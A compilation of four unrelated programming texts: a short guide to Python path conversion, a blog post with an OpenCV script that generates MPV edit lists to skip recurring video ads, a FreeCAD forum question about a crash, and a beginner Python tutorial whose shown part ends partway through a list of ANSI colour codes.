Hello!
Have you ever wanted to convert a relative path into an absolute path, or an absolute path into a relative path?
Converting a relative path to an absolute path is easy with os.path.abspath(), and converting an absolute path to a relative path is easy with os.path.relpath().
This article covers the following:
How to convert a relative path to an absolute path
How to convert an absolute path to a relative path
Converting between relative and absolute paths
How to convert a relative path to an absolute path
To convert a relative path to an absolute path, use os.path.abspath().
import os
print(os.path.abspath(".."))
print(os.path.abspath(""))
print(os.path.abspath("testdir"))
Output:
/Users/(username)/Desktop
/Users/(username)/Desktop/test
/Users/(username)/Desktop/test/testdir
It returns the corresponding absolute path for each input!
By the way, if you pass an empty string, it returns the absolute path of the current directory (second line of the output).
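In other words, passing an empty string should give the same result as os.getcwd(); a quick check (a small sketch, not part of the original article):
import os
print(os.path.abspath("") == os.getcwd())  # True - both give the current working directory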
How to convert an absolute path to a relative path
To convert an absolute path to a relative path, use os.path.relpath().
import os
print(os.path.relpath("/Users/(username)/Desktop"))
print(os.path.relpath("/Users/(username)/Desktop/test"))
print(os.path.relpath("/Users/(username)/Desktop/test/testdir"))
Output:
..
.
testdir
Each call returns the path relative to the current directory. With relpath, however, passing an empty string raises an error.
print(os.path.relpath(""))
Output:
ValueError: no path specified
Make sure to remember this caveat!
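One more thing that may be useful (not covered in the original article, so treat it as a side note): os.path.relpath() also accepts a second start argument, which computes the path relative to a directory other than the current one.
import os
# Path of testdir relative to the Desktop directory, regardless of the current directory
print(os.path.relpath("/Users/(username)/Desktop/test/testdir", start="/Users/(username)/Desktop"))
# -> test/testdir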
Summary
This article covered the following:
How to convert a relative path to an absolute path
→ use os.path.abspath()
How to convert an absolute path to a relative path
→ use os.path.relpath()
Learn both so you can convert between them with confidence!
|
TL;DR: Install OpenCV-Python, download this script and follow the instructions in the script’s --help output.
While I like The Young Turks, they’ve recently started adding the same two or three carnival barker-esque appeals for subscribers to the end of all of their videos. That gets very annoying very quickly.
Since I don’t believe in rewarding bad behaviour (like forcing avid viewers to see the same couple of annoying ads a million times), I refuse to let them nag me into being a member. However, I still need something to occupy my mind while doing boring tasks, so I needed a solution.
As such, here’s a Python OpenCV script which will find the time offset of the first last occurrence of a frame in a video file (eg. a screenshot of the TYT title card that appears between the content and the ad) in a video file and then write an MPV EDL (Edit Decision List) file which will play only the portion of the video prior to the matched frame.
UPDATE: Hint: Put this script, your videos, and one or more screenshots (to be matched in a fallback chain, sorted by name) into the same folder and you can just double-click it.
I’ve also done the preliminary research to fuzzy-match the audio of those two or three naggy bits in case they decide to try to render this ineffective by moving the title card to the very end… partly because it would also give a more accurate cut point if used with the current clips.
(As is, I tend to lose the last 500 to 1500 milliseconds of actual content due to variations in how they cut the pieces of each clip together… but, even if I lost an entire clip every now and then, it'd be an acceptable sacrifice to avoid those annoying nags. Current clips are cut together such that stopping at the last frame of the end-title card removes the nag perfectly.)
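For reference, the generated EDL is just a tiny text file saved next to the video. Its contents look roughly like this (the filename and offset here are made-up example values; the real ones are written by the script below):
# mpv EDL v0
%9%video.mp4,0,1415.2
The %9% prefix is the byte length of the filename that follows, and the trailing numbers mean "start at 0 seconds, play for 1415.2 seconds".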
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# pylint: disable=line-too-long
"""Utility for generating MPV EDL files to skip recurring post-roll ads.
Instructions:
1. Use MPV's screenshot hotkey to extract a frame that's consistently present
at the boundary between the content and the ad.
2. Run this script with the screenshot specified via the --template argument.
3. Play the resulting EDL file in MPV.
(MPV EDL files are like playlists which can specify pieces of video files
rather than entire files)
--snip--
TODO:
- Gather and maintain statistics on which templates matched in a given folder
so that the order in which templates are tried can learn as a way to optimize
the total runtime.
- Read http://docs.opencv.org/trunk/d4/dc6/tutorial_py_template_matching.html
- Consider rewriting in Rust to ease shaking the bugs out:
http://www.poumeyrol.fr/doc/opencv-rust/opencv/imgproc/fn.match_template.html
Sources used to develop this:
- https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html#playing-video-from-file
- https://pythonprogramming.net/template-matching-python-opencv-tutorial/
- http://stackoverflow.com/q/9629071
- http://stackoverflow.com/a/10979030
- http://stackoverflow.com/a/2981202
- https://github.com/mpv-player/mpv/blob/master/DOCS/edl-mpv.rst
- http://smplayer.sourceforge.net/en/mpv
Stuff I tried but threw out because of a bug outside my control:
- http://www.mplayerhq.hu/DOCS/HTML/en/edl.html
- http://forum.smplayer.info/viewtopic.php?p=15706#p15706
Sources used during development:
- http://www.pyimagesearch.com/2016/03/07/transparent-overlays-with-opencv/
""" # NOQA
from __future__ import (absolute_import, division, print_function,
with_statement, unicode_literals)
__author__ = "Stephan Sokolow (deitarion/SSokolow)"
__appname__ = "TYT Post-Roll Ad Eliminator"
__version__ = "0.1"
__license__ = "MIT"
VIDEO_GLOBS = ['*.mp4', '*.webm']
FRAME_GLOBS = ['*.png', '*.jpg']
import fnmatch, logging, os, re
import cv2 as cv
import numpy as np
log = logging.getLogger(__name__)
# Borrowed from:
# https://github.com/ssokolow/game_launcher/blob/master/src/util/common.py
# (Revision: bc784a5fe3c2d4275fef5ec16612bd67142eb0f8)
# TODO: Put this up on PyPI so I don't have to copy it around.
def multiglob_compile(globs, prefix=False, re_flags=0):
"""Generate a single "A or B or C" regex from a list of shell globs.
:param globs: Patterns to be processed by :mod:`fnmatch`.
:type globs: iterable of :class:`~__builtins__.str`
:param prefix: If ``True``, then :meth:`~re.RegexObject.match` will
perform prefix matching rather than exact string matching.
:type prefix: :class:`~__builtins__.bool`
:rtype: :class:`re.RegexObject`
"""
if not globs:
# An empty globs list should only match empty strings
return re.compile('^$')
elif prefix:
globs = [x + '*' for x in globs]
return re.compile('|'.join(fnmatch.translate(x) for x in globs), re_flags)
video_ext_re = multiglob_compile(VIDEO_GLOBS, re_flags=re.I)
frame_ext_re = multiglob_compile(FRAME_GLOBS, re_flags=re.I)
def edl_path_for(video_path):
"""Single place where EDL-path lookup is defined"""
return os.path.splitext(video_path)[0] + '.mpv.edl'
def has_edl(video_path, edl_path=None):
"""Unified definition of how to check whether we should skip a file"""
edl_path = edl_path or edl_path_for(video_path)
# TODO: Also handle the "is EDL" case
if os.path.exists(edl_path):
log.info("EDL already exists. Skipping %r", video_path)
return True
return False
def seek_stream(stream, offset):
"""If offset is negative, it will be treated as a "seconds from the end"
value, analogous to Python list indexing.
"""
fps = stream.get(cv.CAP_PROP_FPS) # pylint: disable=no-member
if offset > 0:
offset *= fps
elif offset < 0:
frame_count = stream.get(
cv.CAP_PROP_FRAME_COUNT) # pylint: disable=no-member
offset = frame_count + (offset * fps)
# It seems seeking via CAP_PROP_POS_MSEC doesn't work
stream.set(cv.CAP_PROP_POS_FRAMES, offset) # pylint: disable=no-member
def find_frame(stream, template, start_pos=None, last_match=None):
"""Given a video stream and a frame, find its offset in seconds.
If start_pos is negative, it will be treated as a "seconds from the end"
value, analogous to Python list indexing.
Does NOT release the stream when finished so it can be used in a manner
similar to file.seek().
Returns the offset in seconds or None for no match.
"""
offset, match = 0, None
# Seek to near the end to minimize processing load
if start_pos is not None:
log.debug("Seeking to %s...", start_pos)
seek_stream(stream, start_pos)
log.debug("Analyzing...")
while stream.isOpened():
success, frame = stream.read()
if not success:
break
offset = stream.get(
cv.CAP_PROP_POS_MSEC) / 1000 # pylint: disable=no-member
# Use template-matching to find the frame signifying the end of content
# pylint: disable=no-member
gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
res = cv.matchTemplate(gray, template, cv.TM_CCOEFF_NORMED)
threshold = 0.8
loc = np.where(res >= threshold) # pylint: disable=no-member
if len(loc[0]): # bool(loc[0]) gives undesired results
if match and (offset - match) > 1:
log.debug("Returning last frame in first match at %s", match)
return match
else:
match = offset
log.debug("Match at %s", match)
if match and not last_match:
log.debug("Returning first match: %s", match)
return match
log.debug("Returning last match (last offset: %s): %s", offset, match)
return match
def analyze_file(video_path, template_path, start_pos=0, last_match=None):
"""High-level wrapper to ease analyzing multiple videos in a single run"""
if last_match is None:
last_match = not os.path.splitext(template_path)[0].endswith('_first')
# pylint: disable=no-member
template = cv.imread(template_path, 0)
stream = cv.VideoCapture(video_path)
# TODO: Safety check that template size doesn't exceed video frame size
# TODO: Figure out how to deduplicate this
try:
end = (stream.get(cv.CAP_PROP_FRAME_COUNT) /
stream.get(cv.CAP_PROP_FPS))
except ZeroDivisionError:
log.info("FPS is zero in %s. Returning None as end.", video_path)
end = None
try:
offset = find_frame(stream, template, start_pos, last_match)
finally:
stream.release()
cv.destroyAllWindows() # TODO: Do I need this anymore?
return offset, end
def make_edl(video_path, template_path, start_pos=0):
"""Highest-level wrapper to make it easy for other scripts to call this"""
edl_path = edl_path_for(video_path)
if has_edl(video_path, edl_path):
return
offset, _ = analyze_file(video_path, template_path, start_pos)
if offset is not None:
# TODO: Skip if (end - offset) < 3sec
video_name = os.path.basename(video_path)
if video_name.startswith('#'): # '#LoserDonald' is not a comment
video_name = './{}'.format(video_name)
video_name = video_name.encode('utf8') # %len% is byte-based
with open(edl_path, 'w') as edl:
edl.write(b"# mpv EDL v0\n%{}%{},0,{:f}".format(
len(video_name), video_name, offset))
return bool(offset)
def make_with_fallbacks(path, templates, skip_to=-30, silent=False):
"""Apply make_edl to a fallback chain of templates"""
if len(templates) < 1:
log.error("len(templates) < 1")
return
# TODO: Do this properly
for tmpl in templates:
try:
log.info("Processing %r with %r", path, tmpl)
success = make_edl(path, tmpl, skip_to)
if success:
break
else:
raise Exception()
except Exception: # pylint: disable=broad-except
log.info("No match for %s in %s", tmpl, path)
else:
if not silent:
log.error("Failed to make EDL for %r", path)
def resolve_path_args(paths, filter_re, default=('.',)):
"""Unified code for resolving video and template arguments"""
if isinstance(paths, basestring):
paths = [paths]
results = []
for path in paths or default:
if os.path.isdir(path):
results.extend(x for x in sorted(os.listdir(path))
if filter_re.match(x))
else:
results.append(path)
assert isinstance(results, list)
return results
def main():
"""The main entry point, compatible with setuptools entry points."""
# If we're running on Python 2, take responsibility for preventing
# output from causing UnicodeEncodeErrors. (Done here so it should only
# happen when not being imported by some other program.)
import sys
if sys.version_info.major < 3:
reload(sys)
sys.setdefaultencoding('utf-8') # pylint: disable=no-member
from argparse import ArgumentParser, RawTextHelpFormatter
parser = ArgumentParser(formatter_class=RawTextHelpFormatter,
description=__doc__.replace('\r\n', '\n').split('\n--snip--\n')[0])
parser.add_argument('--version', action='version',
version="%%(prog)s v%s" % __version__)
parser.add_argument('-v', '--verbose', action="count",
default=2, help="Increase the verbosity. Use twice for extra effect")
parser.add_argument('-q', '--quiet', action="count",
default=0, help="Decrease the verbosity. Use twice for extra effect")
parser.add_argument('--cron', action='store_true',
default=False, help='Silence potentially routine error messages and '
"set a niceness of 19 so OpenCL doesn't interfere with the desktop")
parser.add_argument('-t', '--template', action='append',
help="The frame to search for within the video stream. May be given "
"multiple times to specify a fallback chain. If a directory path "
"is provided, the image files within will be sorted by name "
"and added to the fallback chain. (default: the current directory"
")")
# TODO: Try 30, then back off to 60 if no match.
parser.add_argument('--skip-to', default=-60, type=int,
help="Seek to this position (in seconds) before processing to reduce "
"wasted CPU cycles. Negative values are relative to the end of "
"the file. (default: %(default)s)")
parser.add_argument('video', nargs='*', help="Path to video file "
"(The current working directory will be searched for "
"video files if none are provided)")
args = parser.parse_args()
# Set up clean logging to stderr
log_levels = [logging.CRITICAL, logging.ERROR, logging.WARNING,
logging.INFO, logging.DEBUG]
args.verbose = min(args.verbose - args.quiet, len(log_levels) - 1)
args.verbose = max(args.verbose, 0)
logging.basicConfig(level=log_levels[args.verbose],
format='%(levelname)s: %(message)s')
# Minimize CPU scheduler priority if --cron
if args.cron:
os.nice(19)
paths = resolve_path_args(args.video, video_ext_re)
templates = resolve_path_args(args.template, frame_ext_re)
log.debug("Using templates: %r", templates)
# Process with fallback template support
for path in paths:
if not has_edl(path):
make_with_fallbacks(path, templates, args.skip_to, args.cron)
if __name__ == '__main__':
main()
# vim: set sw=4 sts=4 expandtab :
Using OpenCV to automatically skip recurring post-roll ads by Stephan Sokolow is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
|
The following code causes a crash of FreeCAD (0.18) when the line with removeObject is executed - therefore I have it commented out:
(This is not the "real" code - I extracted it to show the problem.)
Code:
objectAnn=None
import DraftSnap
class Ui_Dialog:
def start():
snapit(0)
def cb(point):
print("cb called by Snapper", point)
if point.__class__.__name__ == 'Vector':
print("Snapper clicked")
objectAnn.LabelText=["New Text"] #This works
# App.ActiveDocument.removeObject(objectAnn.Label) #THIS MAKES CRASH !!!!!!!!!!!!!!!!!!!!!!1
FreeCAD.ActiveDocument.recompute()
return(print("End cb"))
def snapit(i):
global objectAnn
objectAnn = App.ActiveDocument.addObject("App::AnnotationLabel","FCInfoToMouse")
objectAnn.LabelText=["Einfügepunkt klicken"]
point = FreeCADGui.Snapper.getPoint(callback = Ui_Dialog.cb) #snapit runs through and does not wait here till clicked
print("Line after Snapper",objectAnn.Label)
what = Ui_Dialog
what.start()
I tried it on two Intel PCs (Win10 with Intel(R) UHD Graphics 620; Win7 with Nvidia GeForce GT 540M) and an AMD PC (Win7, AMD Radeon R7), always with the same error:
Unhandled Base::Exception caught in GUIApplication::notify.
The error message is: Access violation
Is there a solution?
|
[1] Python Made EZ!
Hi everyone!
Hope y'all are doing great! School is starting real soon, so I hope you have been studying to get ready and are enjoying the last of your vacation!
So I made this tutorial on python so that others can try to learn from it and get better! Hopefully, what I say will be comprehensive and easy to read.
Most of it I will write, but sometimes I will include some stuff from other websites which explain better than me. I will put what I've taken in italic, and the sources and helpful links at the bottom.
By the way, this is the first of tutorials in languages I'm making!
I will be covering:
Hello World!: History of Python
Key Terms
Comments
print
Data Types
Variables
- Printing Variables
- Naming Variables
- Changing Variables
Concatenation
Operators
Comparison Operators
Conditionals
-if
-elif
-else
input
A Bit of Lists
for Loops
while Loops
Functions
Imports
-time
-random
-math
Small Programs and Useful Stuff
ANSI Escape Codes
Links
Goodbye World!: End
Well without any further ado, let's get on with it!
Hello World!: History of Python
Python is a general purpose programming language. It was created by Guido Van Rossum and released in 1991. One of the main features of it is its readability, simple syntax, and few keywords, which makes it great for beginners (with no prior experience of coding) to learn it.
Fun fact: Guido Van Rossum was reading the scripts of Monty Python when he was creating the language; he needed "a name that was short, unique, and slightly mysterious" so he decided to call the language Python.
(Last year we had to make a poem on an important person in Computer Science, so I made one on him: https://docs.google.com/document/d/1yf2T2fFaS3Vwk7zkvN1nPOr8XPXJroL1yHI7z5qhaRc/edit?usp=sharing)
Key Terms
Now before we continue, just a few words you should know:
Console: The black part located at the right/bottom of your screen
Input: stuff that is taken in by the computer (more on this later)
Output: the information processed and sent out by the computer (usually in the console)
Errors: actually, a good thing! Don't worry if you have an error, just try to learn from it and correct it. That's how you can improve, by knowing how to correct errors.
Execute: run a piece of code
Comments
Comments are used for explaining your code, making it more readable, and to prevent execution when testing code.
This is how to comment:
# this is a comment
# it starts with a hashtag #
# Python will ignore and not run anything after the hashtag
You can also have multiline comments:
"""this is a multiline commentI can make it very long!"""
print
The print() function is used for outputting a message (object) onto the console. This is how you use it:
print("Something.")
# remember this is a comment
# you can use double quotes "
# or single quotes '
print('Using single quotes')
print("Is the same as using double quotes")
You can also use triple quotes for big messages.
Example:
print("Hello World!")
print("""
Rules:
[1] Code
[2] Be nice
[3] Lol
[4] Repeat
""")
Output:
Hello World!
Rules:
[1] Code
[2] Be nice
[3] Lol
[4] Repeat
Data Types
Data types are the classification or categorization of data items.
These are the 4 main data types:
int: (integer) a whole number
12 is an int, so is 902.
str: (string) a sequence of characters
"Hi" is a str, so is "New York City".
float: (float) a decimal
-90.0 is a float, so is 128.84
bool: (boolean) data type with 2 possible values: True and False
Note that True has a capital T and False has a capital F!
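If you're ever unsure which of these types a value has, the built-in type() function will tell you (a quick illustrative check, not part of the original examples):
print(type(12))      # <class 'int'>
print(type("Hi"))    # <class 'str'>
print(type(128.84))  # <class 'float'>
print(type(True))    # <class 'bool'>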
Variables
Variables are used for containing/storing information.
Example:
name = "Lucy" # this variable contains a str
age = 25 # this variable contains an int
height = 160.5 # this variable contains a float
can_vote = True # this variable contains a Boolean that is True (because Lucy is 25 y/o)
Printing variables:
To print variables, you simply do print(variableName):
print(name)
print(age)
print(height)
print(can_vote)
Output:
Lucy
25
160.5
True
Naming Variables:
You should try to make variables with a descriptive name. For example, if you have a variable with an age, an appropriate name would be age, not how_old or number_years.
Some rules for naming variables:
must start with a letter (not a number)
no spaces (use underscores)
no keywords or built-in names (like or, print, input, etc.) - see the quick examples below
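Here are a few quick examples of those rules in action (the names are made up for illustration):
user_age = 25             # OK: starts with a letter, uses an underscore instead of a space
favourite_color = "blue"  # OK
# 2nd_place = "Bob"       # not allowed: starts with a number (SyntaxError)
# full name = "Ann"       # not allowed: contains a space (SyntaxError)
# print = 5               # runs, but hides the built-in print() - avoid reusing built-in names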
Changing Variables:
You can change variables to other values.
For example:
x = 18
print(x)
x = 19
print(x)
# the output will be:
# 18
# 19
As you can see, we have changed the variable x from the initial value of 18 to 19.
Concatenation
Let's go back to our first 3 variables:
name = "Lucy"
age = 25
height = 160.5
What if we want to make a sentence like this: Her name is Lucy, she is 25 years old and she measures 160.5 cm.
Of course, we could just print that whole thing like this:
print("Her name is Lucy, she is 25 years old and she measures 160.5 cm.")
But if we want to do this with variables, we could do it something like this:
print("Her name is " + name + ", she is " + age + " years old and she measures " + height + " cm.")
# try running this!
Aha! If you ran it, you should have gotten an error (a TypeError complaining that str and int cannot be concatenated).
Basically, it means that you cannot concatenate int to str. But what does concatenate mean?
Concatenate means join/link together, like the concatenation of "sand" and "castle" is "sandcastle"
In the previous code, we want to concatenate the bits of sentences ("Her name is ", ", she is", etc.) as well as the variables (name, age, and height).
Since the computer can only concatenate str together, we simply have to convert those variables into str, like so:
print("Her name is " + name + ", she is " + str(age) + " years old and she measures " + str(height) + " cm.")
# since name is already a str, no need to convert it
Output:
Her name is Lucy, she is 25 years old and she measures 160.5 cm.
Operators
A symbol or function denoting an operation
Basically operators can be used in math.
List of operators:
+ For adding numbers (can also be used for concatenation) | Eg: 12 + 89 = 101
- For subtracting numbers | Eg: 65 - 5 = 60
* For multiplying numbers | Eg: 12 * 4 = 48
/ For dividing numbers (always gives a float) | Eg: 60 / 5 = 12.0
** Exponentiation ("to the power of") | Eg: 2**3 = 8
// Floor division (divides numbers and takes away everything after the decimal point) | Eg: 100 // 3 = 33
% Modulo (divides numbers and returns what's left over (the remainder)) | Eg: 50 % 30 = 20
These operators can be used for decreasing/increasing variables.
Example:
x = 12
x += 3
print(x)
# this will output 15, because 12 + 3 = 15
You can replace the + in += by any other operator that you want:
x = 6
x *= 5
print(x)
y = 9
y /= 3
print(y)
# this will output 30 and then, below it, 3.0 (division always gives a float)
Also: x += y is just a shorter version of writing x = x + y; both work the same
Comparison Operators
Comparison operators are for, well, comparing things. They return a Boolean value, True or False. They can be used in conditionals.
List of comparison operators:
== equal to | Eg: 7 == 7
!= not equal to | Eg: 7 != 8
> bigger than | Eg: 12 > 8
< smaller than | Eg: 7 < 9
>= bigger than or equal to | Eg: 19 >= 19
<= smaller than or equal to | Eg: 1 <= 4
If we type these into the console, we will get either True or False:
6 > 7 # will return False
12 < 80 # will return True
786 != 787 # will return True
95 <= 96 # will return True
Conditionals
Conditionals are used to verify if an expression is True or False.
if
Example: we want to see if a number is bigger than another one.
How to say it in English: "If the number 10 is bigger than the number 5, then…"
How to say it in Python:
if 10 > 5:
# etc.
All the code that is indented will be inside that if statement. It will only run if the condition is verified.
You can also use variables in conditionals:
x = 20
y = 40
if x < y:
print("20 is smaller than 40"!)
# the output of this program will be "20 is smaller than 40"! because the condition (x < y) is True.
elif
elif is basically like if; it checks if several conditions are True
Example:
age = 16
if age == 12:
print("You're 12 years old!")
elif age == 14:
print("You're 14 years old!")
elif age == 16:
print("You're 16 years old!")
This program will output:
You're 16 years old!
Because age = 16.
else
else usually comes after the if/elif. Like the name implies, the code inside it only executes if the previous conditions are False.
Example:
age = 12
if age >= 18:
print("You can vote!")
else:
print("You can't vote yet!)
Output:
You can't vote yet!
Because age < 18.
input
The input function is used to prompt the user. It will stop the program until the user types something and presses the return key.
You can assign the input to a variable to store what the user types.
For example:
username = input("Enter your username: ")
# then you can print the username
print("Welcome, "+str(username)+"!")
Output:
Enter your username: Bookie0
Welcome, Bookie0!
By default, input() gives you whatever the user typed as a str, but you can convert it to another type like this:
number = int(input("Enter a number: ")) # converts what the user says into an int
# if the user types a str or float, then there will be an error message.
# doing int(input()) is useful for calculations, now we can do this:
number += 10
print("If you add 10 to that number, you get: "+ str(number)) # remember to convert it to str for concatenation!
Output:
Enter a number: 189
If you add 10 to that number, you get: 199
You can also do float(input("")) to convert it to float.
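As a quick illustration of that (the prompt and the numbers here are made up):
price = float(input("Enter a price: "))  # typing 4.99 gives the float 4.99
price *= 2
print("Twice that price is: " + str(price))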
Now, here is a little program summarizing a bit of what you've learnt so far.
Full program:
username = input("Username: ")
password = input("Password: ")
admin_username = "Mr.ADMIN"
admin_password = "[email protected]"
if username == admin_username:
if password == admin_password:
print("Welcome Admin! You are the best!")
else:
print("Wrong password!")
else:
print("Welcome, "+str(username)+"!")
Now a detailed version:
# inputs
username = input("Username: ") # asks user for the username
password = input("Password: ") # asks user for the password
# variables
admin_username = "Mr.ADMIN" # setting the admin username
admin_password = "[email protected]" # setting the admin passsword
# conditionals
if username == admin_username: # if the user entered the exact admin username
if password == admin_password: # if the user enters the exact and correct admin password
print("Welcome Admin! You are the best!") # a welcome message only to the admin
else: # if the user gets the admin password wrong
print("Error! Wrong password!") # an error message appears
else: # if the user enters something different than the admin username
print("Welcome, general user "+str(username)+"!") # a welcome message only for general users
Output:
An option:
Username: Mr.ADMIN
Password: i dont know
Error! Wrong password!
Another option:
Username: Mr.ADMIN
Password: [email protected]
Welcome Admin! You are the best!
Final option:
Username: Bob
Password: Chee$e
Welcome, general user Bob!
A bit of lists
A list is a collection which is ordered and changeable. Lists are written with square brackets: []
meat = ["beef", "lamb", "chicken"]
print(meat)
Output:
['beef', 'lamb', 'chicken']
You can access specific items of the list with the index number. Now here is the kinda tricky part. Indexes start at 0, meaning that the first item of the list has an index of 0, the second item has an index of 1, the third item has an index of 2, etc.
meat = ["beef", "lamb", "chicken"]
# Index: 0 1 2 etc.
print(meat[2]) # will output "chicken" because it is at index 2
You can also use negative indexing: index -1 means the last item, index -2 means the second to last item, etc.
meat = ["beef", "lamb", "chicken"]
# Index: -3 -2 -1 etc.
print(meat[-3]) # will output "beef" because it is at index -3
You can add items in the list using append():
meat = ["beef", "lamb", "chicken"]
meat.append("pork")
print(meat)
Output:
['beef', 'lamb', 'chicken', 'pork']
"pork" will be added at the end of the list.
For removing items in the list, use remove():
meat = ['beef', 'lamb', 'chicken']
meat.remove("lamb")
print(meat)
Output:
['beef', 'chicken']
You can also use del to remove items at a specific index:
meat = ['beef', 'lamb', 'chicken']
del meat[0]
print(meat)
Output:
['lamb', 'chicken']
There are also many other things you can do with lists, check out this: https://www.w3schools.com/python/python_lists.asp for more info!
for loops
A for loop is used for iterating over a sequence. Basically, it runs a piece of code for a specific number of times.
For example:
for i in range(5):
print("Hello!")
Output:
Hello!
Hello!
Hello!
Hello!
Hello!
You can also use the for loop to print each item in a list (using the list from above):
meat = ['beef', 'lamb', 'chicken']
for i in meat:
print(i)
Output:
beef
lamb
chicken
while loops
while loops will run a piece of code as long as the condition is True.
For example:
x = 1 # sets x to 1
while x <= 10: # will repeat 10 times
print(x) # prints x
x += 1 # increments (adds 1) to x
Output:
1
2
3
4
5
6
7
8
9
10
You can also make while loops go on for infinity, like so (useful for spamming lol):
while True:
print("Theres no stopping me nowwwww!")
Output:
Theres no stopping me nowwwww!
Theres no stopping me nowwwww!
Theres no stopping me nowwwww!
Theres no stopping me nowwwww!
Theres no stopping me nowwwww!
# etc. until infinity
Functions
A function is a group of code that only executes when it is called.
For example, instead of having to type a piece of code several times, you can put that piece of code inside a function, and then whenever you need it you can just call the function.
def greeting(): # defining the function
print("Bonjour!") # everything that is indented will be executed when the function is called
greeting() # calling the function
# you can now call this function when you want, instead of always writing the same code everytime
Output:
Bonjour!
return and arguments
The return statement is used in functions. It ends the function and "returns" the result, i.e. the value of the expression following the return keyword, to the caller. It is not mandatory; you don't have to use it.
You can also have arguments inside a function. This allows you to pass values into the function. The arguments go in the parentheses.
For example:
def sum(x, y): # x and y are the arguments
total = x + y
return total # "assigns" x + y to the function
result = sum(4, 5) # you can change those to what you want
print(result) # this will output 9, because 4+5 = 9
Imports
time
You can use time in your Python programs.
How to make the program wait:
# first import time
import time
print("Hello!")
# then for the program to wait
time.sleep(1) # write how long you want to wait (in seconds) in the parenthesis
print("Bye!")
Output:
Hello!
# (program waits 1 second)
Bye!
You can also do this (simpler):
import time
from time import sleep
# instead of time.sleep(), do sleep()
# its the same
print("time.sleep(1)...")
time.sleep(1)
print("...is the same as...")
sleep(1)
print("sleep(1)!")
random
You can use the random module to randomly pick numbers with randint():
# remember to import!
import random
from random import randint
rand_num = randint(1,5)
# this will output a random number between 1 and 5 inclusive!
# this means the possible numbers are 1, 2, 3, 4, or 5
The reason I am pointing this out is that you can also use randrange():
import random
from random import randrange
rand_num = randrange(1,5)
# this will output a random number between 1 inclusive and 5 NON-inclusive (or 4 inclusive)!
# this means the possible numbers are 1, 2, 3, or 4
You can also randomly pick an item from a list with choice():
import random
from random import choice
meat = ["beef", "lamb", "chicken"]
rand_meat = choice(meat)
print(rand_meat)
# this will output a randomly chosen item of the list meat
# the possible outcomes are beef, lamb, or chicken.
math
First, some functions are already built into Python: min() and max(). They return the smallest and the biggest of the values inside the parentheses, respectively.
For example:
list_a = min(18, 12, 14, 16)
list_b = max(17, 19, 15, 13)
print(list_a) # will output 12
print(list_b) # will output 19
Now for some more modules:
You can use math.floor() and math.ceil() to round numbers down or up to the nearest int.
For example:
# first import
import math
num_a = math.floor(2.3)
num_b = math.ceil(2.3)
print(num_a) # will output 2
print(num_b) # will output 3
Explanation (from Andrew Sutherland's course): math.floor() rounds 2.3 down to the nearest lower int, which in this case is 2. This is because, if you imagine it, the floor is at the bottom, so that's why it rounds the number down.
Vice-versa for math.ceil(); it rounds 2.3 up to the nearest higher int, which in this case is 3. This is because ceil is short for ceiling (programmers like to shorten words), and the ceiling is high up.
You can also get pi (π):
import math
pi = math.pi
print(pi)
Output:
3.141592653589793
Here is the full list of all the things you can do with math: https://www.w3schools.com/python/module_math.asp
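A couple more helpers from that module that come up often (a small illustrative snippet; the full list is in the link above):
import math
print(math.sqrt(16))      # 4.0  - square root
print(math.fabs(-7.5))    # 7.5  - absolute value, always returned as a float
print(round(math.pi, 2))  # 3.14 - round() is built in, no import needed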
Small Programs You Can Use
Countdown Program:
# imports
import time
from time import sleep
def countdown(): # making a function for the countdown (so you can use it several times)
count = int(input("Countdown from what? ")) # asks user how long the countdown
while count >= 0: # will repeat until count = 0
print(count) # prints where the countdown is at
count -= 1 # subtracts 1 from count
sleep(1) # program waits 1 second before continuing
print("End of countdown!") # message after the countdown
countdown() # remember to call the function or nothing will happen
Output:
Countdown from what? 5
5
4
3
2
1
0
End of countdown!
Simple Calculator
First way using eval()
calculation = input("Type your calculation: ") # asks the user for a calculation.
print("Answer to " + str(calculation) + ": " + str(eval(calculation)))
# eval basically does the operation, like on a normal calculator.
# however, if you write something different than a valid operation, there will be an error.
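Since eval() raises an error on anything that isn't a valid expression (and will happily run whatever code you give it, so only use it with input you trust), it can help to wrap it - a minimal sketch:
calculation = input("Type your calculation: ")
try:
    print("Answer to " + calculation + ": " + str(eval(calculation)))
except Exception:
    print("That doesn't look like a valid calculation!")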
Or another way, using several conditionals, and you can only do "something" + "something" (but with the operators):
def calculator(): # making a function to hold all the code for calculator
while True: # loops forever so you can make several calculations without having to press run again
first_num = int(input("Enter 1st number: ")) # asks user for 1st number
second_num = int(input("Enter 2nd number: ")) # asks user for 2nd number
operator = input("Select operator: + - * / ** // ") # asks user for operator
if operator == "+": # addition
answer = first_num + second_num
print(answer)
elif operator == "-": # subtraction
answer = first_num - second_num
print(answer)
elif operator == "*": # multiplication
answer = first_num * second_num
print(answer)
elif operator == "/": # division
answer = first_num / second_num
print(answer)
elif operator == "**": # exponentiation ("to the power of")
answer = first_num ** second_num
print(answer)
elif operator == "//": # floor division
answer = first_num // second_num
print(answer)
else: # if user selects an invalid operator
print("Invalid!")
calculator() # calls the function
But obviously that is pretty long and full of many if/elif.
Some functions that are useful:
"Press ENTER to continue" Prompt:
def enter():
input("Press ENTER to continue! ")
# this is useful for text based adventure games; when they finish reading some text, they can press ENTER and the next part will follow.
# just call the function where you need it
Spacing in between lines function:
def space():
print()
print()
# same as pressing ENTER twice, this is useful to make your text a bit more airy, makes it less compact and block like.
Slowprint:
# first imports:
import time, sys
from time import sleep
def sp(str):
for letter in str:
sys.stdout.write(letter)
sys.stdout.flush()
time.sleep(0.06)
print()
# to use it:
sp("Hello there!")
# this will output Hello There! one letter every 0.06 seconds, making it look like the typewriter effect.
ANSI Escape Codes
ANSI escape codes are for controlling text in the console. You can use it to make what is in the output nicer for the user.
For example, you can use \n for a new line:
name = input("Enter your name\n>>> ")
Output:
Enter your name
>>>
This makes it look nice, you can start typing on the little prompt arrows >>>.
You can also use \t for tab:
print("Hello\tdude")
Output:
Hello dude
\v for vertical tab:
print("Hello\vdude")
Output:
Hello dude
You can also have colors in python:
# the ANSI codes are stored in variables, making them easier to use
black = "\033[0;30m"
red = "\033[0;31m"
green = "\033[0;32m"
yellow = "\033[0;33m"
blue = "\033[0;34m"
magenta = "\033[0;35m"
cyan = "\033[0;36m"
white = "\033[0;37m"
bright_black = "\033[0;90m"
bright_red = "\033[0;91m"
bright_green = "\033[0;92m"
bright_yellow = "\033[0;93m"
bright_blue = "\033[0;94m"
